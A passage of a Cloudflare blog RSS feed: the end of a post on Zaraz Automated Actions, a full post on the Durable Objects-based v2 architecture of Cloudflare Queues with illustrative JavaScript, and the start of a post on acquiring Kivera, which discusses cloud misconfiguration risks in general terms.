          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1LRtb8XpSukCAgmK7uIA5Y/ab11ae9b58f474d08893b496a0eea764/image7.png" />
          </figure><ul><li><p><b>Pageviews</b>: Automatically sends data to the tool whenever someone visits a page on your site, without any manual configuration.</p></li><li><p><b>All other events</b>: Sends all custom events triggered using <code>zaraz.track()</code> to the selected tool, making it easy to automate tracking of user interactions.</p></li><li><p><b>Ecommerce</b>: Automatically sends all e-commerce events triggered via <code>zaraz.ecommerce()</code> to the tool, streamlining your sales and transaction tracking.</p></li></ul><p>These Automated Actions are also available for all your existing tools, and can be toggled on or off from the tool detail page in your Zaraz dashboard. This flexibility allows you to fine-tune which actions are automated based on your needs.</p>
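<p>In client-side code, the corresponding Web API calls are minimal. A hedged sketch (the event names and properties here are hypothetical; <code>zaraz</code> is the global that Zaraz injects on pages where it is enabled):</p>

```javascript
// Guarded wrapper so the same code is safe outside the browser;
// returns whether the event was actually forwarded to Zaraz.
function safeTrack(name, props = {}) {
  if (typeof zaraz === "undefined") return false;
  zaraz.track(name, props); // picked up by "All other events"
  return true;
}

// Pageviews: nothing to call; they are sent automatically once the
// "Pageviews" automated action is enabled.

// A custom event, forwarded with no trigger/action configuration:
safeTrack("signup_click", { plan: "pro" });

// An e-commerce event, forwarded by the "Ecommerce" automated action:
if (typeof zaraz !== "undefined") {
  zaraz.ecommerce("Order Completed", { order_id: "1234", total: 42.5 });
}
```
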
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/xy1tIfYTfOo7p2IUeCS5d/42b26d6cfc4c05d8adc67edfc38ac34c/image10.png" />
          </figure>
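    <p>As a rough sketch, the three Automated Action classes map onto the Zaraz Web API like this (the event names and payload fields below are illustrative, not prescribed by Zaraz):</p>

```javascript
// Illustrative calls for each Automated Action class. Assumes the Zaraz
// snippet has loaded `zaraz` onto the page; the event names and payload
// fields here are made up for the example.
// Pageviews need no call at all: Zaraz reports them automatically.

function reportSignup(plan) {
  // Custom events go through zaraz.track() and are picked up by the
  // "all other events" Automated Action.
  zaraz.track('signup', { plan });
}

function reportOrder(orderId, total) {
  // E-commerce events go through zaraz.ecommerce() and are picked up by
  // the "ecommerce" Automated Action.
  zaraz.ecommerce('Order Completed', { order_id: orderId, total });
}
```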
    <div>
      <h3>Custom actions for tools without Automated Action support</h3>
      <a href="#custom-actions-for-tools-without-automated-action-support">
        
      </a>
    </div>
    <p>Some tools do not support automated actions because the tool itself does not support page view, custom, or e-commerce events. For such tools you can still create your own custom actions, just like before. Custom actions allow you to configure specific events to send data to your tools based on unique triggers. The process remains the same, and you can follow the detailed steps outlined in our <a href="https://developers.cloudflare.com/zaraz/get-started/create-actions/"><u>Create Actions guide</u></a>. Remember to set up your trigger first, or choose an existing one, before configuring the action.</p>
    <div>
      <h4>Automatically enrich your payload</h4>
      <a href="#automatically-enrich-your-payload">
        
      </a>
    </div>
    <p>When creating a custom action, it is now easier to send Event Properties using the <b>Include Event Properties</b> field. When this is toggled on, you can automatically send client-specific data with each action, such as user behavior or interaction details. For example, to send a <code>userID</code> property along with a <code>click</code> event, you can do something like this: <code>zaraz.track('click', { userID: 'foo' })</code>.</p><p>Additionally, you can enable the <b>Include System Properties</b> option to send system-level information, such as browser, operating system, and more. In your action settings, click “Add Field”, pick “Include System Properties”, confirm, and then toggle the field on.</p><p>For a full list of system properties, visit our <a href="https://developers.cloudflare.com/zaraz/reference/context/"><u>System Properties reference guide</u></a>. These options give you greater flexibility and control over the data you send with custom actions.</p><p>These two fields replace the now-deprecated “Enrich Payload” dropdown field.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/73nCsNmeG58p6n0ylxMV8E/5cb87b516aaceb38319f9175dc7ccbf3/image5.png" />
          </figure><p>Zaraz Automated Actions marks a significant step forward in simplifying how you manage events across your tools. By automating common actions like page views, e-commerce events, and custom tracking, you can save time and reduce the complexity of manual configurations. Whether you’re leveraging Automated Actions for speed or creating custom actions for more tailored use cases, Zaraz offers the flexibility to fit your workflow. </p><p>We’re excited to see how you use this feature. Please don’t hesitate to reach out to us on Cloudflare <a href="https://discord.gg/2TRr6nSxdd"><u>Zaraz’s Discord Channel</u></a> — we’re always there fixing issues, listening to feedback, and announcing exciting product updates.</p>
    <div>
      <h2>Never miss an update</h2>
      <a href="#never-miss-an-update">
        
      </a>
    </div>
    <p>We’ll keep sharing roundup blog posts as we continue to build and innovate. Be sure to follow along on the <a href="https://blog.cloudflare.com/"><u>Cloudflare Blog</u></a> for the latest news and updates.</p> ]]></content:encoded>
            <category><![CDATA[Identity]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Zaraz]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Managed Components]]></category>
            <guid isPermaLink="false">5BHU4q5GpzBQ1OLQoUvkKN</guid>
            <dc:creator>Joseph So</dc:creator>
            <dc:creator>Omar Mohammad</dc:creator>
            <dc:creator>Yo'av Moshe</dc:creator>
        </item>
        <item>
            <title><![CDATA[Durable Objects aren't just durable, they're fast: a 10x speedup for Cloudflare Queues]]></title>
            <link>https://blog.cloudflare.com/how-we-built-cloudflare-queues/</link>
            <pubDate>Thu, 24 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Learn how we built Cloudflare Queues using our own Developer Platform and how it evolved to a geographically-distributed, horizontally-scalable architecture built on Durable Objects. Our new architecture supports over 10x more throughput and over 3x lower latency compared to the previous version. ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/developer-platform/products/cloudflare-queues/"><u>Cloudflare Queues</u></a> let a developer decouple their Workers into event-driven services. Producer Workers write events to a Queue, and consumer Workers are invoked to take actions on the events. For example, you can use a Queue to decouple an e-commerce website from a service which sends purchase confirmation emails to users. During 2024’s Birthday Week, we <a href="https://blog.cloudflare.com/builder-day-2024-announcements?_gl=1*18s1fwl*_gcl_au*MTgyNDA5NjE5OC4xNzI0MjgzMTQ0*_ga*OTgwZmE0YWUtZWJjMS00NmYxLTllM2QtM2RmY2I4ZjAwNzZk*_ga_SQCRB0TXZW*MTcyODkyOTU2OS4xNi4xLjE3Mjg5Mjk1NzcuNTIuMC4w/#queues-is-ga"><u>announced that Cloudflare Queues is now Generally Available</u></a>, with significant performance improvements that enable larger workloads. To accomplish this, we switched to a new architecture for Queues that enabled the following improvements:</p><ul><li><p>Median latency for sending messages has dropped from ~200ms to ~60ms</p></li><li><p>Maximum throughput for each Queue has increased over 10x, from 400 to 5000 messages per second</p></li><li><p>Maximum Consumer concurrency for each Queue has increased from 20 to 250 concurrent invocations</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5PvIsHfLwwIkp2LXVUDhmG/99f286f2f89d10b2a7e359d8d66f6dba/image5.png" />
          </figure><p><sup><i>Median latency drops from ~200ms to ~60ms as Queues are migrated to the new architecture</i></sup></p><p>In this blog post, we'll share details about how we built Queues using Durable Objects and the Cloudflare Developer Platform, and how we migrated from an initial Beta architecture to a geographically-distributed, horizontally-scalable architecture for General Availability.</p>
    <div>
      <h3>v1 Beta architecture</h3>
      <a href="#v1-beta-architecture">
        
      </a>
    </div>
    <p>When initially designing Cloudflare Queues, we decided to build something simple that we could get into users' hands quickly. First, we considered leveraging an off-the-shelf messaging system such as Kafka or Pulsar. However, we decided that it would be too challenging to operate these systems at scale with the large number of isolated tenants that we wanted to support.</p><p>Instead of investing in new infrastructure, we decided to build on top of one of Cloudflare's existing developer platform building blocks: <b>Durable Objects.</b> <a href="https://www.cloudflare.com/developer-platform/durable-objects/"><u>Durable Objects</u></a> are a simple, yet powerful building block for coordination and storage in a distributed system. In our initial <i>v1 </i>architecture, each Queue was implemented using a single Durable Object. As shown below, clients would send messages to a Worker running in their region, which would be forwarded to the single Durable Object hosted in the WNAM (Western North America) region. We used a single Durable Object for simplicity, and hosted it in WNAM for proximity to our centralized configuration API service.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/yxj5Gut3usYa0mFbRddXU/881f5905f789bc2f910ee1b2dcadac92/image1.png" />
          </figure><p>One of a Queue's main responsibilities is to accept and store incoming messages. Sending a message to a <i>v1</i> Queue used the following flow:</p><ul><li><p>A client sends a POST request containing the message body to the Queues API at <code>/accounts/:accountID/queues/:queueID/messages</code></p></li><li><p>The request is handled by an instance of the <b>Queue Broker Worker</b> in a Cloudflare data center running near the client.</p></li><li><p>The Worker performs authentication, and then uses Durable Objects <code>idFromName</code> API to route the request to the <b>Queue Durable Object</b> for the given <code>queueID</code></p></li><li><p>The Queue Durable Object persists the message to storage before returning a <i>success </i>back to the client.</p></li></ul><p>Durable Objects handled most of the heavy-lifting here: we did not need to set up any new servers, storage, or service discovery infrastructure. To route requests, we simply provided a <code>queueID</code> and the platform handled the rest. To store messages, we used the Durable Object storage API to <code>put</code> each message, and the platform handled reliably storing the data redundantly.</p>
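    <p>The routing step above can be sketched as a Worker like this (the <code>QUEUE_DO</code> binding name and <code>parseQueuePath</code> helper are hypothetical; <code>idFromName</code> and stub <code>fetch</code> are the standard Durable Objects APIs):</p>

```javascript
// Hypothetical sketch of the v1 producer path. QUEUE_DO is an assumed
// Durable Object binding name; the path format matches the API route above.
function parseQueuePath(pathname) {
  // /accounts/:accountID/queues/:queueID/messages
  const m = pathname.match(/^\/accounts\/([^/]+)\/queues\/([^/]+)\/messages$/);
  if (!m) throw new Error('not a queue messages path');
  return { accountID: m[1], queueID: m[2] };
}

const queueBroker = {
  async fetch(request, env) {
    // ...authentication elided...
    const { queueID } = parseQueuePath(new URL(request.url).pathname);
    // idFromName is deterministic: every request for the same queueID
    // reaches the same Durable Object, wherever it was placed.
    const id = env.QUEUE_DO.idFromName(queueID);
    return env.QUEUE_DO.get(id).fetch(request);
  },
};
```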
    <div>
      <h3>Consuming messages</h3>
      <a href="#consuming-messages">
        
      </a>
    </div>
    <p>The other main responsibility of a Queue is to deliver messages to a Consumer. Delivering messages in a v1 Queue used the following process:</p><ul><li><p>Each Queue Durable Object maintained an <b>alarm </b>that was always set when there were undelivered messages in storage. The alarm guaranteed that the Durable Object would reliably wake up to deliver any messages in storage, even in the presence of failures. The alarm time was configured to fire after the user's selected <i>max wait time</i><b><i>, </i></b>if only a partial batch of messages was available. Whenever one or more full batches were available in storage, the alarm was scheduled to fire immediately.</p></li><li><p>The alarm would wake the Durable Object, which continually looked for batches of messages in storage to deliver.</p></li><li><p>Each batch of messages was sent to a "Dispatcher Worker" that used <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/"><u>Workers for Platforms</u></a> <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/reference/how-workers-for-platforms-works/#dynamic-dispatch-worker"><i><u>dynamic dispatch</u></i></a> to pass the messages to the <code>queue()</code> function defined in a user's Consumer Worker</p></li></ul>
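    <p>The alarm rule in the first bullet can be written as a small pure function (a simplified sketch with our own names and units, not the internal implementation):</p>

```javascript
// Illustrative version of the v1 alarm rule: fire immediately when a full
// batch is in storage, otherwise after the consumer's max wait time, and
// set no alarm at all when storage is empty.
function nextAlarmTime(availableMessages, batchSize, maxWaitMs, nowMs) {
  if (availableMessages === 0) return null;          // nothing to deliver
  if (availableMessages >= batchSize) return nowMs;  // full batch: deliver now
  return nowMs + maxWaitMs;                          // partial batch: wait it out
}
```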
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4vAM17x3nN49JBMGNTblPp/6af391950df5f0fbc14faeccb351e38c/image4.png" />
          </figure><p>This v1 architecture let us flesh out the initial version of the Queues Beta product and onboard users quickly. Using Durable Objects allowed us to focus on building application logic, instead of complex low-level systems challenges such as global routing and guaranteed durability for storage. Using a separate Durable Object for each Queue allowed us to host an essentially unlimited number of Queues, and provided isolation between them.</p><p>However, using <i>only</i> one Durable Object per queue had some significant limitations:</p><ul><li><p><b>Latency: </b>we created all of our v1 Queue Durable Objects in Western North America. Messages sent from distant regions incurred significant latency when traversing the globe.</p></li><li><p><b>Throughput: </b>A single Durable Object is not scalable: it is single-threaded and has a fixed capacity for how many requests per second it can process. This is where the previous 400 messages per second limit came from.</p></li><li><p><b>Consumer Concurrency: </b>Due to <a href="https://developers.cloudflare.com/workers/platform/limits/#simultaneous-open-connections"><u>concurrent subrequest limits</u></a>, a single Durable Object was limited in how many concurrent subrequests it could make to our Dispatcher Worker. This limited the number of <code>queue()</code> handler invocations that it could run simultaneously.</p></li></ul><p>To solve these issues, we created a new v2 architecture that horizontally scales across <b>multiple</b> Durable Objects to implement each single high-performance Queue.</p>
    <div>
      <h3>v2 Architecture</h3>
      <a href="#v2-architecture">
        
      </a>
    </div>
    <p>In the new v2 architecture for Queues, each Queue is implemented using multiple Durable Objects, instead of just one. Instead of a single region, we place <i>Storage Shard </i>Durable Objects in <a href="https://developers.cloudflare.com/durable-objects/reference/data-location/#supported-locations-1"><u>all available regions</u></a> to enable lower latency. Within each region, we create multiple Storage Shards and load balance incoming requests amongst them. Just like that, we’ve multiplied message throughput.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2SJTb2UO8tKGrh26ixwLrA/7272e4eaf6f7e85f086a5ae08670387e/image2.png" />
          </figure><p>Sending a message to a v2 Queue uses the following flow:</p><ul><li><p>A client sends a POST request containing the message body to the Queues API at <code>/accounts/:accountID/queues/:queueID/messages</code></p></li><li><p>The request is handled by an instance of the <b>Queue Broker Worker</b> running in a Cloudflare data center near the client.</p></li><li><p>The Worker:</p><ul><li><p>Performs authentication</p></li><li><p>Reads from Workers KV to obtain a <i>Shard Map</i> that lists available storage shards for the given <code>region</code> and <code>queueID</code></p></li><li><p>Picks one of the region's Storage Shards at random, and uses Durable Objects <code>idFromName</code> API to route the request to the chosen shard</p></li></ul></li><li><p>The Storage Shard persists the message to storage before returning a <i>success </i>back to the client.</p></li></ul><p>In this v2 architecture, messages are stored in the closest available Durable Object storage cluster near the user, greatly reducing latency since messages don't need to be shipped all the way to WNAM. Using multiple shards within each region removes the bottleneck of a single Durable Object, and allows us to scale each Queue horizontally to accept even more messages per second. <a href="https://blog.cloudflare.com/tag/cloudflare-workers-kv/"><u>Workers KV</u></a> acts as a fast metadata store: our Worker can quickly look up the shard map to perform load balancing across shards.</p><p>To improve the <i>Consumer</i> side of v2 Queues, we used a similar "scale out" approach. A single Durable Object can only perform a limited number of concurrent subrequests. In v1 Queues, this limited the number of concurrent subrequests we could make to our Dispatcher Worker. To work around this, we created a new <i>Consumer Shard</i> Durable Object class that we can scale horizontally, enabling us to execute many more concurrent instances of our users' <code>queue()</code> handlers.</p>
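    <p>The shard-map lookup and random pick from the send flow above can be sketched like this (the map's shape is assumed for illustration; the real format isn't documented here):</p>

```javascript
// Illustrative shard selection for the v2 producer path. The shard map
// (as cached in Workers KV) is assumed to look like:
//   { "weur": ["shard-weur-0", "shard-weur-1"], "wnam": [...] }
function pickStorageShard(shardMap, region) {
  const shards = shardMap[region];
  if (!shards || shards.length === 0) {
    throw new Error(`no storage shards available in ${region}`);
  }
  // A uniform random pick spreads writes evenly across the region's
  // shards; the chosen name is then resolved with idFromName as in v1.
  return shards[Math.floor(Math.random() * shards.length)];
}
```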
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2ujodUVBegDcWXi6DYJR41/5f31ba4da387df82613a496ff311f65f/image3.png" />
          </figure><p>Consumer Durable Objects in v2 Queues use the following approach:</p><ul><li><p>Each Consumer maintains an alarm that guarantees it will wake up to process any pending messages. <i>v2 </i>Consumers are notified by the Queue's <i>Coordinator </i>(introduced below) when there are messages ready for consumption. Upon notification, the Consumer sets an alarm to go off immediately.</p></li><li><p>The Consumer looks at the shard map, which contains information about the storage shards that exist for the Queue, including the number of available messages on each shard.</p></li><li><p>The Consumer picks a random storage shard with available messages, and asks for a batch.</p></li><li><p>The Consumer sends the batch to the Dispatcher Worker, just like for v1 Queues.</p></li><li><p>After processing the messages, the Consumer sends another request to the Storage Shard to either "acknowledge" or "retry" the messages.</p></li></ul><p>This scale-out approach enabled us to work around the subrequest limits of a single Durable Object, and increase the maximum supported concurrency level of a Queue from 20 to 250. </p>
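    <p>The "pick a random storage shard with available messages" step can be sketched similarly (the per-shard metadata fields are assumed for the example):</p>

```javascript
// Illustrative consumer-side shard choice: only shards that report a
// non-empty backlog in the shard map are candidates for draining.
function pickShardToDrain(shards) {
  const ready = shards.filter((s) => s.availableMessages > 0);
  if (ready.length === 0) return null; // nothing to consume right now
  return ready[Math.floor(Math.random() * ready.length)];
}
```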
    <div>
      <h3>The Coordinator and “Control Plane”</h3>
      <a href="#the-coordinator-and-control-plane">
        
      </a>
    </div>
    <p>So far, we have primarily discussed the "Data Plane" of a v2 Queue: how messages are load balanced amongst Storage Shards, and how Consumer Shards read and deliver messages. The other main piece of a v2 Queue is the "Control Plane", which handles creating and managing all the individual Durable Objects in the system. In our v2 architecture, each Queue has a single <i>Coordinator</i> Durable Object that acts as the brain of the Queue. Requests to create a Queue, or change its settings, are sent to the Queue's Coordinator.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7lYJs23oJ8ibtGgbuOk9JN/7ffa8073a4391602b67a0c6e134975bc/image7.png" />
          </figure><p>The Coordinator maintains a <i>Shard Map</i> for the Queue, which includes metadata about all the Durable Objects in the Queue (including their region, number of available messages, current estimated load, etc.). The Coordinator periodically writes a fresh copy of the Shard Map into Workers KV, as pictured in step 1 of the diagram. Placing the shard map into Workers KV ensures that it is globally cached and available for our Worker to read quickly, so that it can pick a shard to accept the message.</p><p>Every shard in the system periodically sends a heartbeat to the Coordinator as shown in steps 2 and 3 of the diagram. Both Storage Shards and Consumer Shards send heartbeats, including information like the number of messages stored locally, and the current load (requests per second) that the shard is handling. The Coordinator uses this information to perform <b><i>autoscaling. </i></b>When it detects that the shards in a particular region are overloaded, it creates additional shards in the region, and adds them to the shard map in Workers KV. Our Worker sees the updated shard map and naturally load balances messages across the freshly added shards. Similarly, the Coordinator looks at the backlog of available messages in the Queue, and decides to add more Consumer shards to increase Consumer throughput when the backlog is growing. Consumer Shards pull messages from Storage Shards for processing as shown in step 4 of the diagram.</p><p>Switching to a new scalable architecture allowed us to meet our performance goals and take Queues to GA. As a recap, this new architecture delivered these significant improvements:</p><ul><li><p>P50 latency for writing to a Queue has dropped from ~200ms to ~60ms.</p></li><li><p>Maximum throughput for a Queue has increased from 400 to 5000 messages per second.</p></li><li><p>Maximum consumer concurrency has increased from 20 to 250 invocations.	</p></li></ul>
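    <p>The Coordinator's scale-out decision described above can be sketched as a pure function (field names and the load ceiling are invented for the example; the real Coordinator also weighs backlog size, regions, and consumer throughput):</p>

```javascript
// Illustrative autoscaling rule: given the per-shard heartbeats for a
// region and a target load ceiling, decide how many extra shards to add.
function shardsToAdd(heartbeats, maxLoadPerShard) {
  const totalLoad = heartbeats.reduce((sum, h) => sum + h.requestsPerSecond, 0);
  const needed = Math.ceil(totalLoad / maxLoadPerShard);
  return Math.max(0, needed - heartbeats.length);
}
```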
    <div>
      <h3>What's next for Queues</h3>
      <a href="#whats-next-for-queues">
        
      </a>
    </div>
    <ul><li><p>We plan on leveraging the performance improvements in the new <a href="https://developers.cloudflare.com/durable-objects/"><u>beta version of Durable Objects</u></a>, which uses SQLite, to continue to improve throughput and latency in Queues.</p></li><li><p>We will soon be adding message management features to Queues so that you can purge messages in a queue, pause consumption of messages, or “redrive”/move messages from one queue to another (for example, messages that have been sent to a Dead Letter Queue could be “redriven”, or moved back, to the original queue).</p></li><li><p>We’re working to make Queues the "event hub" for the Cloudflare Developer Platform:</p><ul><li><p>Create a low-friction way for events emitted from other Cloudflare services with event schemas to be sent to Queues.</p></li><li><p>Build multi-Consumer support for Queues so that Queues are no longer limited to one Consumer per queue.</p></li></ul></li></ul><p>To start using Queues, head over to our <a href="https://developers.cloudflare.com/queues/get-started/"><u>Getting Started</u></a> guide. </p><p>Do distributed systems like Cloudflare Queues and Durable Objects interest you? Would you like to help build them at Cloudflare? <a href="https://boards.greenhouse.io/embed/job_app?token=5390243&amp;gh_src=b2e516a81us"><u>We're Hiring!</u></a></p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare Queues]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Durable Objects]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">41vXJNWrB0YHsKqSz6SGDS</guid>
            <dc:creator>Josh Wheeler</dc:creator>
            <dc:creator>Siddhant Sinha</dc:creator>
            <dc:creator>Todd Mantell</dc:creator>
            <dc:creator>Pranshu Maheshwari</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare acquires Kivera to add simple, preventive cloud security to Cloudflare One ]]></title>
            <link>https://blog.cloudflare.com/cloudflare-acquires-kivera/</link>
            <pubDate>Tue, 08 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ The acquisition of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services.  ]]></description>
            <content:encoded><![CDATA[ <p>We’re excited to announce that <a href="https://www.kivera.io/"><u>Kivera</u></a>, a cloud security, data protection, and compliance company, has joined Cloudflare. This acquisition extends our SASE portfolio to incorporate inline cloud app controls, empowering <a href="https://www.cloudflare.com/zero-trust/"><u>Cloudflare One</u></a> customers with preventative security controls for all their cloud services.</p><p>In today’s digital landscape, cloud services and SaaS (software as a service) apps have become indispensable for the daily operation of organizations. At the same time, the amount of data flowing between organizations and their cloud providers has ballooned, increasing the chances of data leakage, compliance issues, and worse, opportunities for attackers. Additionally, many companies — especially at enterprise scale — are working directly with multiple cloud providers for flexibility based on the strengths, resiliency against outages or errors, and cost efficiencies of different clouds. </p><p>Security teams that rely on <a href="https://www.cloudflare.com/learning/cloud/what-is-cspm/"><u>Cloud Security Posture Management (CSPM)</u></a> or similar tools for monitoring cloud configurations and permissions and Infrastructure as code (IaC) scanning are falling short due to detecting issues only after misconfigurations occur with an overwhelming volume of alerts. The combination of Kivera and Cloudflare One puts preventive controls directly into the deployment process, or ‘inline’, blocking errors before they happen. This offers a proactive approach essential to protecting cloud infrastructure from evolving cyber threats, <a href="https://www.cloudflare.com/learning/cloud/what-is-dspm/">maintaining data security</a>, and accelerating compliance. </p>
    <div>
      <h2>An early warning system for cloud security risks </h2>
      <a href="#an-early-warning-system-for-cloud-security-risks">
        
      </a>
    </div>
    <p>In a significant leap forward in cloud security, the combination of Kivera’s technology and Cloudflare One adds preventive, inline controls to enforce secure configurations for cloud resources. By inspecting cloud API traffic, these new capabilities equip organizations with enhanced visibility and granular controls, allowing for a proactive approach in mitigating risks, managing cloud security posture, and embracing a streamlined DevOps process when deploying cloud infrastructure.</p><p>Kivera will add the following capabilities to Cloudflare’s <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/"><u>SASE</u></a> platform:</p><ul><li><p><b>One-click security:</b> Customers benefit from immediate prevention of the most common cloud breaches caused by misconfigurations, such as accidentally allowing public access or policy inconsistencies.</p></li><li><p><b>Enforced cloud tenant control:</b> Companies can easily draw boundaries around their cloud resources and tenants to ensure that sensitive data stays within their organization. </p></li><li><p><b>Prevent data exfiltration:</b> Easily set rules to prevent data being sent to unauthorized locations.</p></li><li><p><b>Reduce ‘shadow’ cloud infrastructure:</b> Ensure that every interaction between a customer and their cloud provider is in line with preset standards. 
</p></li><li><p><b>Streamline cloud security compliance:</b> Customers can automatically assess and enforce compliance against the most common regulatory frameworks.</p></li><li><p><b>Flexible DevOps model:</b> Enforce bespoke controls independent of public cloud setup and deployment tools, minimizing the layers of lock-in between an organization and a cloud provider.</p></li><li><p><b>Complementing other cloud security tools:</b> Create a first line of defense for cloud deployment errors, reducing the volume of alerts for customers also using CSPM tools or <a href="https://www.cloudflare.com/learning/cloud/cnapp/">Cloud Native Application Protection Platforms (CNAPPs)</a>. </p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7nALx5Qv8FBYxn1R6RkUvX/1b3dddb60d9d85142a9fda82d2eee381/BLOG-2592_2.png" />
          </figure><p><sub><i>An intelligent proxy that uses a policy-based approach to 
enforce secure configuration of cloud resources.</i></sub></p>
    <div>
      <h2>Better together with Cloudflare One</h2>
      <a href="#better-together-with-cloudflare-one">
        
      </a>
    </div>
    <p>As a SASE platform, Cloudflare One ensures safe access and provides data controls for cloud and SaaS apps. This integration broadens the scope of Cloudflare’s SASE platform beyond user-facing applications to incorporate increased cloud security through proactive configuration management of infrastructure services, beyond what CSPM and <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/"><u>CASB</u></a> solutions provide. With the addition of Kivera to Cloudflare One, customers now have a unified platform for all their inline protections, including cloud control, access management, and threat and data protection. All of these features are available with single-pass inspection, which is <a href="https://blog.cloudflare.com/network-performance-update-cio-edition/?_ga=2.241337794.1947644748.1710771073-1224524116.1709647459"><u>50% faster</u></a> than <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/"><u>Secure Web Gateway (SWG)</u></a> alternatives.  </p><p>With the earlier <a href="https://blog.cloudflare.com/cloudflare-acquires-bastionzero/"><u>acquisition of BastionZero</u></a>, a Zero Trust infrastructure access company, Cloudflare One expanded the scope of its VPN replacement solution to cover infrastructure resources as easily as it does apps and networks. Together Kivera and BastionZero enable centralized security management across hybrid IT environments, and provide a modern DevOps-friendly way to help enterprises connect and protect their hybrid infrastructure with Zero Trust best practices.</p><p>Beyond its SASE capabilities, Cloudflare One is integral to <a href="https://www.cloudflare.com/connectivity-cloud/"><u>Cloudflare’s connectivity cloud</u></a>, enabling organizations to consolidate IT security tools on a single platform. This simplifies secure access to resources, from developer privileged access to technical infrastructure and expanding cloud services. 
As <a href="https://www.cloudflare.com/lp/forrester-wave-sse-2024/"><u>Forrester echoes</u></a>, “Cloudflare is a good choice for enterprise prospects seeking a high-performance, low-maintenance, DevOps-oriented solution.”</p>
    <div>
      <h2>The growing threat of cloud misconfigurations</h2>
      <a href="#the-growing-threat-of-cloud-misconfigurations">
        
      </a>
    </div>
    <p>The cloud has become a prime target for cyberattacks. According to the <a href="https://www.crowdstrike.com/resources/reports/crowdstrike-2023-cloud-risk-report-executive-summary/"><u>2023 Cloud Risk Report</u></a>, CrowdStrike observed a 95% increase in cloud exploitation from 2021 to 2022, with a staggering 288% jump in cases involving threat actors directly targeting the cloud.</p><p>Misconfigurations in cloud infrastructure settings, such as improperly set security parameters and default access controls, provide adversaries with an easy path to infiltrate the cloud. According to the <a href="https://cpl.thalesgroup.com/sites/default/files/content/cloud-security/2024/2024-thales-cloud-security-study-global-edition.pdf"><u>2023 Thales Global Cloud Security Study</u></a>, which surveyed nearly 3,000 IT and security professionals from 18 countries, 44% of respondents reported experiencing a data breach, with misconfigurations and human error identified as the leading cause, accounting for 31% of the incidents.</p><p>Further, according to Gartner<sup>Ⓡ</sup>, “Through 2027, 99% of records compromised in cloud environments will be the result of user misconfigurations and account compromise, not the result of an issue with the cloud provider.”<sup>1</sup></p><p>Several factors contribute to the rise of cloud misconfigurations:</p><ul><li><p><b>Rapid adoption of cloud services:</b> Leaders are often driven by the scalability, cost-efficiency, and ability to support remote work and real-time collaboration that cloud services offer. These factors enable rapid adoption of cloud services which can lead to unintentional misconfigurations as IT teams struggle to keep up with the pace and complexity of these services. </p></li><li><p><b>Complexity of cloud environments:</b> Cloud infrastructure can be highly complex with multiple services and configurations to manage. 
For example, <a href="https://public.docs.kivera.io/docs/access-analyzer"><u>AWS alone offers</u></a> 373 services with 15,617 actions and 140,000+ parameters, making it challenging for IT teams to manage settings accurately. </p></li><li><p><b>Decentralized management:</b> In large organizations, cloud infrastructure resources are often managed by multiple teams or departments. Without centralized oversight, inconsistent security policies and configurations can arise, increasing the risk of misconfigurations.</p></li><li><p><b>Continuous Integration and Continuous Deployment (CI/CD):</b> <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD pipelines</a> promote the ability to rapidly deploy, change and frequently update infrastructure. With this velocity comes the increased risk of misconfigurations when changes are not properly managed and reviewed.</p></li><li><p><b>Insufficient training and awareness:</b> Employees may lack the cross-functional skills needed for cloud security, such as understanding networks, identity, and service configurations. This knowledge gap can lead to mistakes and increases the risk of misconfigurations that compromise security.</p></li></ul>
    <div>
      <h3>Common exploitation methods </h3>
      <a href="#common-exploitation-methods">
        
      </a>
    </div>
    <p>Threat actors exploit cloud services through various means, including targeting misconfigurations, abusing privileges, and bypassing encryption. Misconfigurations such as exposed storage buckets or improperly secured APIs offer attackers easy access to sensitive data and resources. Privilege abuse occurs when attackers gain unauthorized access through compromised credentials or poorly managed identity and access management (IAM) policies, allowing them to escalate their access and move laterally within the cloud environment. Additionally, unencrypted data enables attackers to intercept and decrypt data in transit or at rest, further compromising the integrity and confidentiality of sensitive information.</p><p>Here are some other vulnerabilities that organizations should address: </p><ul><li><p><b>Unrestricted access to cloud tenants:</b> Allowing unrestricted access exposes cloud platforms to <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">data exfiltration</a> by malicious actors. Limiting access to approved tenants with specific IP addresses and service destinations helps prevent unauthorized access.</p></li><li><p><b>Exposed access keys:</b> Exposed access keys can be exploited by unauthorized parties to steal or delete data. Requiring encryption for the access keys and restricting their usage can mitigate this risk.</p></li><li><p><b>Excessive account permissions:</b> Granting excessive privileges to cloud accounts increases the potential impact of security breaches. Limiting permissions to necessary operations helps prevent lateral movement and privilege escalation by threat actors.</p></li><li><p><b>Inadequate network segmentation:</b> Poorly managed network security groups and insufficient segmentation practices can allow attackers to move freely 